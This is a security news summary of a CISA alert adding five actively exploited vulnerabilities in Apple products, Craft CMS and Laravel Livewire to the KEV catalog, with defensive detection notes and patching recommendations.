Skip to content
.ca
sign in
3 minhigh

CISA Adds Five Known Exploited Vulnerabilities to Catalog

CISA has updated its Known Exploited Vulnerabilities (KEV) Catalog with five new actively exploited vulnerabilities affecting Apple products, Craft CMS, and Laravel Livewire. Organizations are strongly urged to prioritize timely remediation of these flaws to reduce exposure to cyberattacks.

Sens:ImmediateConf:highAnalyzed:2026-03-20reports

Authors: CISA

VulnerabilityAppleCISA KEVLaravel LivewireCraft CMS

Source:CISA

Key Takeaways

  • CISA added five new vulnerabilities to the Known Exploited Vulnerabilities (KEV) Catalog due to evidence of active exploitation.
  • The vulnerabilities affect Apple products, Craft CMS, and Laravel Livewire.
  • Exploited flaws include buffer overflows, code injection, and improper locking.
  • Federal Civilian Executive Branch (FCEB) agencies are required to remediate these vulnerabilities under BOD 22-01.
  • All organizations are strongly urged to prioritize patching these vulnerabilities to reduce cyberattack exposure.

Affected Systems

  • Apple Multiple Products
  • Craft CMS
  • Laravel Livewire

Vulnerabilities (CVEs)

  • CVE-2025-31277
  • CVE-2025-32432
  • CVE-2025-43510
  • CVE-2025-43520
  • CVE-2025-54068

Attack Chain

Threat actors are actively exploiting specific vulnerabilities in Apple products (buffer overflows, improper locking), Craft CMS (code injection), and Laravel Livewire (code injection) to compromise affected systems. Specific attack chains, payloads, and post-exploitation activities are not detailed in the alert.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

No specific detection rules or queries are provided in the alert.

Detection Engineering Assessment

EDR Visibility: Low — The alert only lists CVEs without detailing specific post-exploitation behaviors, processes, or payloads that EDR would detect. Network Visibility: Low — No network indicators, exploit traffic patterns, or C2 infrastructure details are provided. Detection Difficulty: Hard — Without specific IOCs or behavioral details, detection relies entirely on identifying vulnerable software versions via scanning rather than detecting active exploitation telemetry.

Required Log Sources

  • Vulnerability Management Scans
  • Patch Management Logs
  • Web Application Firewall (WAF) Logs

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Search for unexpected child processes spawning from Craft CMS or Laravel Livewire web application processes, indicating potential successful code injection.Process Creation (Event ID 4688 / Sysmon Event ID 1) or Linux Auditd execve eventsExecutionLow

Control Gaps

  • Lack of timely patching for public-facing applications and endpoints.

Key Behavioral Indicators

  • Presence of vulnerable software versions on the network.

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Identify and patch all instances of Apple products, Craft CMS, and Laravel Livewire affected by the listed CVEs.

Infrastructure Hardening

  • Implement a robust vulnerability management program to ensure timely patching of KEV catalog items.
  • Deploy Web Application Firewalls (WAF) to monitor and filter potentially malicious traffic targeting web applications like Craft CMS and Laravel Livewire.

User Protection

  • Ensure Apple endpoint devices (macOS, iOS, etc.) are updated to the latest vendor-supplied versions.

Security Awareness

  • Educate IT and security teams on the requirements of BOD 22-01 and the importance of prioritizing the CISA KEV catalog in patch management workflows.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1203 - Exploitation for Client Execution

Related